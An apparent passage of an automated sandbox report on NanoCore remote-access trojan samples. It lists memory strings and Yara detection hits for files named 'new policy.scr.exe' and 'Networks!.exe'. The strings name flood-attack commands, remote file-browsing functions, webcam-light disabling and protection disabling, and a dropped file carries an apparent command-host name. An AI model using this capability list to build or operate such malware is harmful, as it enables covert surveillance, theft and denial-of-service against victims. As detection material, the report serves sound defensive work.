zeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHand
leTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHost
Source: Yara match File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR
Source: Yara match File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED